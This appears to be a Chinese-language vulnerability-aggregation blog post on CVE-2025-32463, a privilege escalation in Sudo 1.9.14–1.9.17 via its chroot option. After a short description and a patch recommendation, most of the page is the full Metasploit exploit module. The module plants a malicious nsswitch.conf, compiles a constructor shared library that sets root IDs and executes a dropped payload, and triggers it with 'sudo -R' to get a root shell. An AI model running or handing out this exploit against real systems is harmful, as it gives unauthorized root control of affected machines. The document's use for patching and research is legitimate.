Sudo Chroot 1917 Privilege Escalation

漏洞信息

漏洞名称： Sudo Chroot 1.9.17 Privilege Escalation

漏洞编号：

CVE： CVE-2025-32463

漏洞类型： 权限提升

漏洞等级： 高危

漏洞描述： 该漏洞影响的是Linux系统中的Sudo命令，Sudo是一个广泛使用的程序，允许系统管理员授权特定用户以超级用户或其他用户的身份运行某些命令。它通常部署在企业级服务器和个人计算机上，以实现权限的精细控制。此次发现的漏洞属于权限提升类型，技术根源在于Sudo在处理chroot环境时的安全缺陷，攻击者可以利用此漏洞在不需要知道当前用户密码的情况下，提升至root权限。具体来说，漏洞存在于Sudo版本1.9.14至1.9.17中，当Sudo在chroot环境中执行命令时，未能正确验证和限制用户权限，导致攻击者可以构造恶意请求绕过权限检查。这种漏洞的危害性极高，因为成功利用后，攻击者可以完全控制系统，执行任意命令，访问敏感数据，甚至安装后门。值得注意的是，利用此漏洞通常需要攻击者已经获得了系统的一个低权限shell，但无需进一步的认证即可提升权限。因此，对于运行受影响版本Sudo的系统，建议立即更新到最新版本以避免潜在的安全风险。

产品名称： Sudo

影响版本： 1.9.14 <= version <= 1.9.17

来源： https://github.com/rapid7/metasploit-framework/blob/0935435ffbbac04e7680f7f2fb5a51d63980bfad/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

类型： rapid7/metasploit-framework:github issues

POC详情


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          This exploit module illustrates how a vulnerability could be exploited
          in an linux command for priv esc.
        },
        'License' => MSF_LICENSE,

        'Author' => [
          'msutovsky-r7', # module dev
          'Stratascale', # poc dev
          'Rich Mirch' # security research
        ],
        'Platform' => [ 'linux' ],

        'Arch' => [ ARCH_CMD ],

        # chmod has some issues for meterpreter, forcing shell
        'SessionTypes' => [ 'shell' ],

        'Targets' => [[ 'Auto', {} ]],

        'Privileged' => true,

        'References' => [
          [ 'EDB', '52352' ],
          [ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/'],
          [ 'CVE', '2025-32463']
        ],
        'DisclosureDate' => '2025-06-30',

        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),

    ]
  end

  # borrowed from exploits/linux/local/sudo_baron_samedit.rb
  def get_versions
    versions = {}
    output = cmd_exec('sudo --version')
    if output
      version = output.split("\n").first.split(' ').last
      versions[:sudo] = version if version =~ /^\d/
    end
    versions
  end

  def check
    sudo_version = get_versions[:sudo]

    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil?

    return CheckCode::Safe if !file?('/etc/nsswitch.conf')

    # as sudo --version returns the version in format [version]p[minor version?], so this removes p
    sudo_version.gsub!(/p/, '.')

    return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))

    CheckCode::Safe("Sudo #{sudo_version} is not vulnerable")
  end

  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    # needs to compile in real-time to adjust payload execution path
    fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

    payload_file = rand_text_alphanumeric(5..10)

    existing_shell = cmd_exec('echo $0 || echo ${SHELL}')

    # puts existing_shell

    return Failure::NotFound, 'Could not find shell' unless file?(existing_shell)

    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!#{existing_shell}\n" + payload.encoded)

    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

    base_dir = rand_text_alphanumeric(5..10)

    lib_filename = rand_text_alphanumeric(5..10)

    mkdir(temp_dir)

    cd(temp_dir)

    cmd_exec("mkdir -p #{base_dir}/etc libnss_")

    return Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file("#{base_dir}/etc/nsswitch.conf", "passwd: /#{lib_filename}\n")

    return Failure::PayloadFailed, 'Failed to copy /etc/group' unless copy_file('/etc/group', "#{base_dir}/etc/group")

    exploit_code = %<
    #include <stdlib.h>
    #include <unistd.h>

    __attribute__((constructor))
    void exploit(void) {
      setreuid(0,0);
      setregid(0,0);
      chdir("/");
      execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL); /* root shell */
    }>

    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

    cmd_exec("sudo -R #{base_dir} #{base_dir}")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end

Github Poc

#rapid7/metasploit-framework:github issues #权限提升

Sudo Chroot 1917 Privilege Escalation

http://example.com/2025/07/17/github_1105129622/

作者

lianccc

发布于

2025年7月17日

许可协议

WordPress PDF 2 Post Remote Code Execution Vulnerability 上一篇

Wing FTP Server 远程代码执行漏洞下一篇